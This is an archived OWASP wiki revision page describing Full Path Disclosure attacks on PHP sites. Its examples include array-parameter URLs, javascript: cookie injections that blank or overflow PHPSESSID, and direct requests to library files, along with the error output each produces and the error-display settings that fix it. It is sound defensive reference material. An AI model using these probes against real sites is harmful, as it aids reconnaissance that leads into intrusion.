This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Full Path Disclosure"
Jakub Vrána (talk | contribs) (Promote display_errors) |
(Added paragraph for "Invalid Session Cookies") |
||
| Line 27: | Line 27: | ||
'''Null Session Cookie''' | '''Null Session Cookie''' | ||
| − | Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using | + | Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using JavaScript Injections. |
A simple injection using this method would look something like so: | A simple injection using this method would look something like so: | ||
<pre>javascript:void(document.cookie="PHPSESSID=");</pre> | <pre>javascript:void(document.cookie="PHPSESSID=");</pre> | ||
| Line 38: | Line 38: | ||
Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by [http://www.php.net/errorfunc.configuration#ini.display-errors display_errors]. | Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by [http://www.php.net/errorfunc.configuration#ini.display-errors display_errors]. | ||
| + | '''Invalid Session Cookie''' | ||
| + | |||
| + | As a complement to the Null Session Cookie, a very long session could also produce an error containing FPD. | ||
| + | This could also be accomplished using a JavaScript injection like so: | ||
| + | <pre>javascript:void(document.cookie='PHPSESSID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');</pre> | ||
| + | By simply setting the PHPSESSID cookie to 129 bytes or more, PHP may spit out a warning. | ||
| + | |||
| + | Another approach would be to to set the PHPSESSID cookie data to one of the reserved bytes. | ||
| + | <pre>javascript:void(document.cookie='PHPSESSID=.');</pre> | ||
| + | |||
| + | Both variants result in the following. | ||
| + | <pre>Warning: session_start(): The session id is too long or contains illegal characters, | ||
| + | valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre> | ||
| + | |||
| + | The same remedy as for Null Session Cookie may be applied here. | ||
| + | Errors may be hidden from the output by [http://www.php.net/errorfunc.configuration#ini.display-errors display_errors]. | ||
'''Direct Access to files that requires preloaded library files''' | '''Direct Access to files that requires preloaded library files''' | ||
Revision as of 17:06, 18 July 2012
- This is an Attack. To view all attacks, please see the Attack Category page.
Last revision: 07/18/2012
Description
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.
Risk Factors
TBD
Examples
Empty Array
If we have a site that uses a method of requesting a page like this:
http://site.com/index.php?page=about
We can use a method of opening and closing braces that causes the page to output an error. This method would look like this:
http://site.com/index.php?page[]=about
This renders the page defunct thus spitting out an error:
Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84 Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131
Null Session Cookie
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using JavaScript Injections. A simple injection using this method would look something like so:
javascript:void(document.cookie="PHPSESSID=");
By simply setting the PHPSESSID cookie to nothing (null) we get an error.
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
error_reporting(0);
Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by display_errors.
Invalid Session Cookie
As a complement to the Null Session Cookie, a very long session could also produce an error containing FPD. This could also be accomplished using a JavaScript injection like so:
javascript:void(document.cookie='PHPSESSID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
By simply setting the PHPSESSID cookie to 129 bytes or more, PHP may spit out a warning.
Another approach would be to to set the PHPSESSID cookie data to one of the reserved bytes.
javascript:void(document.cookie='PHPSESSID=.');
Both variants result in the following.
Warning: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
The same remedy as for Null Session Cookie may be applied here. Errors may be hidden from the output by display_errors.
Direct Access to files that requires preloaded library files
Web application developers sometimes fail to add safe checks in files that requires preloaded library/function files. This is prone to reveal possible sensitive information when those applications' URLs are directly requested. Sometimes, it's a clue to Local File Inclusion vulnerability.
Concerning with Mambo CMS, if we access to a direct url, http://site.com/mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php, then we gets
<br /> <b>Fatal error</b>: Class 'SpellChecker' not found in <b>/home/victim/public_html/mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php</b> on line <b>9</b><br />
Tool
The above three checks can be done with the aid of inspathx tool.
Related Threat Agents
Related Attacks
Related Vulnerabilities
- None
Related Controls
- Error Handling
- Bounds Checking
- Safe Libraries
- Static Code Analysis
- Executable space protection
- Address space layout randomization (ASLR)
- Stack-smashing Protection (SSP)
